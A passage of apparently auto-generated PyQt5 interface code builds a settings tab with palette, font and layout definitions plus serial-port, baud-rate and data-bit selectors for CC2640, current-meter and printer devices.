self.horizontalLayout_5.setStretch(1, 1)
self.verticalLayout_8.addLayout(self.horizontalLayout_5)
self.verticalLayout.addLayout(self.verticalLayout_8)
self.verticalLayout_2 = QtWidgets.QVBoxLayout()
self.verticalLayout_2.setContentsMargins(-1, -1, -1, 15)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.cc2640_head_text = QtWidgets.QLineEdit(self.tab_setting)
self.cc2640_head_text.setEnabled(False)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.cc2640_head_text.setPalette(palette)
font = QtGui.QFont()
font.setFamily("Microsoft YaHei")
font.setPointSize(16)
self.cc2640_head_text.setFont(font)
self.cc2640_head_text.setLayoutDirection(QtCore.Qt.LeftToRight)
self.cc2640_head_text.setFrame(True)
self.cc2640_head_text.setAlignment(QtCore.Qt.AlignCenter)
self.cc2640_head_text.setReadOnly(True)
self.cc2640_head_text.setObjectName("cc2640_head_text")
self.verticalLayout_2.addWidget(self.cc2640_head_text)
self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.verticalLayout_4 = QtWidgets.QVBoxLayout()
self.verticalLayout_4.setObjectName("verticalLayout_4")
self.lineEdit_6 = QtWidgets.QLineEdit(self.tab_setting)
self.lineEdit_6.setEnabled(False)
self.lineEdit_6.setLayoutDirection(QtCore.Qt.LeftToRight)
self.lineEdit_6.setAlignment(QtCore.Qt.AlignCenter)
self.lineEdit_6.setReadOnly(True)
self.lineEdit_6.setObjectName("lineEdit_6")
self.verticalLayout_4.addWidget(self.lineEdit_6)
self.lineEdit_7 = QtWidgets.QLineEdit(self.tab_setting)
self.lineEdit_7.setEnabled(False)
self.lineEdit_7.setAlignment(QtCore.Qt.AlignCenter)
self.lineEdit_7.setReadOnly(True)
self.lineEdit_7.setObjectName("lineEdit_7")
self.verticalLayout_4.addWidget(self.lineEdit_7)
self.lineEdit_8 = QtWidgets.QLineEdit(self.tab_setting)
self.lineEdit_8.setEnabled(False)
self.lineEdit_8.setAlignment(QtCore.Qt.AlignCenter)
self.lineEdit_8.setReadOnly(True)
self.lineEdit_8.setObjectName("lineEdit_8")
self.verticalLayout_4.addWidget(self.lineEdit_8)
self.btn_cc2640_setting = QtWidgets.QPushButton(self.tab_setting)
self.btn_cc2640_setting.setObjectName("btn_cc2640_setting")
self.verticalLayout_4.addWidget(self.btn_cc2640_setting)
self.horizontalLayout_3.addLayout(self.verticalLayout_4)
self.verticalLayout_3 = QtWidgets.QVBoxLayout()
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.cc2640_comboBox_port = QtWidgets.QComboBox(self.tab_setting)
self.cc2640_comboBox_port.setEditable(True)
self.cc2640_comboBox_port.setObjectName("cc2640_comboBox_port")
self.verticalLayout_3.addWidget(self.cc2640_comboBox_port)
self.cc2640_comboBox_baudrate = QtWidgets.QComboBox(self.tab_setting)
self.cc2640_comboBox_baudrate.setObjectName("cc2640_comboBox_baudrate")
self.verticalLayout_3.addWidget(self.cc2640_comboBox_baudrate)
self.cc2640_comboBox_databits = QtWidgets.QComboBox(self.tab_setting)
self.cc2640_comboBox_databits.setObjectName("cc2640_comboBox_databits")
self.verticalLayout_3.addWidget(self.cc2640_comboBox_databits)
self.btn_cc2640_autodetect = QtWidgets.QPushButton(self.tab_setting)
self.btn_cc2640_autodetect.setObjectName("btn_cc2640_autodetect")
self.verticalLayout_3.addWidget(self.btn_cc2640_autodetect)
self.horizontalLayout_3.addLayout(self.verticalLayout_3)
self.horizontalLayout_3.setStretch(0, 1)
self.horizontalLayout_3.setStretch(1, 1)
self.verticalLayout_2.addLayout(self.horizontalLayout_3)
self.verticalLayout.addLayout(self.verticalLayout_2)
self.verticalLayout_5 = QtWidgets.QVBoxLayout()
self.verticalLayout_5.setContentsMargins(-1, -1, -1, 10)
self.verticalLayout_5.setObjectName("verticalLayout_5")
self.currenter_head_text = QtWidgets.QLineEdit(self.tab_setting)
self.currenter_head_text.setEnabled(False)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.currenter_head_text.setPalette(palette)
font = QtGui.QFont()
font.setFamily("Microsoft YaHei UI")
font.setPointSize(16)
self.currenter_head_text.setFont(font)
self.currenter_head_text.setLayoutDirection(QtCore.Qt.LeftToRight)
self.currenter_head_text.setAlignment(QtCore.Qt.AlignCenter)
self.currenter_head_text.setReadOnly(True)
self.currenter_head_text.setObjectName("currenter_head_text")
self.verticalLayout_5.addWidget(self.currenter_head_text)
self.verticalLayout_11 = QtWidgets.QVBoxLayout()
self.verticalLayout_11.setContentsMargins(-1, -1, -1, 15)
self.verticalLayout_11.setObjectName("verticalLayout_11")
self.horizontalLayout_6 = QtWidgets.QHBoxLayout()
self.horizontalLayout_6.setObjectName("horizontalLayout_6")
self.verticalLayout_12 = QtWidgets.QVBoxLayout()
self.verticalLayout_12.setObjectName("verticalLayout_12")
self.lineEdit_21 = QtWidgets.QLineEdit(self.tab_setting)
self.lineEdit_21.setEnabled(False)
self.lineEdit_21.setLayoutDirection(QtCore.Qt.LeftToRight)
self.lineEdit_21.setAlignment(QtCore.Qt.AlignCenter)
self.lineEdit_21.setReadOnly(True)
self.lineEdit_21.setObjectName("lineEdit_21")
self.verticalLayout_12.addWidget(self.lineEdit_21)
self.lineEdit_22 = QtWidgets.QLineEdit(self.tab_setting)
self.lineEdit_22.setEnabled(False)
self.lineEdit_22.setAlignment(QtCore.Qt.AlignCenter)
self.lineEdit_22.setReadOnly(True)
self.lineEdit_22.setObjectName("lineEdit_22")
self.verticalLayout_12.addWidget(self.lineEdit_22)
self.lineEdit_27 = QtWidgets.QLineEdit(self.tab_setting)
self.lineEdit_27.setEnabled(False)
self.lineEdit_27.setAlignment(QtCore.Qt.AlignCenter)
self.lineEdit_27.setReadOnly(True)
self.lineEdit_27.setObjectName("lineEdit_27")
self.verticalLayout_12.addWidget(self.lineEdit_27)
self.btn_currenter_setting = QtWidgets.QPushButton(self.tab_setting)
self.btn_currenter_setting.setObjectName("btn_currenter_setting")
self.verticalLayout_12.addWidget(self.btn_currenter_setting)
self.horizontalLayout_6.addLayout(self.verticalLayout_12)
self.verticalLayout_13 = QtWidgets.QVBoxLayout()
self.verticalLayout_13.setObjectName("verticalLayout_13")
self.currenter_comboBox_port = QtWidgets.QComboBox(self.tab_setting)
self.currenter_comboBox_port.setEditable(True)
self.currenter_comboBox_port.setObjectName("currenter_comboBox_port")
self.verticalLayout_13.addWidget(self.currenter_comboBox_port)
self.currenter_comboBox_baudrate = QtWidgets.QComboBox(self.tab_setting)
self.currenter_comboBox_baudrate.setObjectName("currenter_comboBox_baudrate")
self.verticalLayout_13.addWidget(self.currenter_comboBox_baudrate)
self.currenter_comboBox_databits = QtWidgets.QComboBox(self.tab_setting)
self.currenter_comboBox_databits.setObjectName("currenter_comboBox_databits")
self.verticalLayout_13.addWidget(self.currenter_comboBox_databits)
self.btn_currenter_autodetect = QtWidgets.QPushButton(self.tab_setting)
self.btn_currenter_autodetect.setObjectName("btn_currenter_autodetect")
self.verticalLayout_13.addWidget(self.btn_currenter_autodetect)
self.horizontalLayout_6.addLayout(self.verticalLayout_13)
self.horizontalLayout_6.setStretch(0, 1)
self.horizontalLayout_6.setStretch(1, 1)
self.verticalLayout_11.addLayout(self.horizontalLayout_6)
self.verticalLayout_5.addLayout(self.verticalLayout_11)
self.printer_head_text = QtWidgets.QLineEdit(self.tab_setting)
self.printer_head_text.setEnabled(False)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
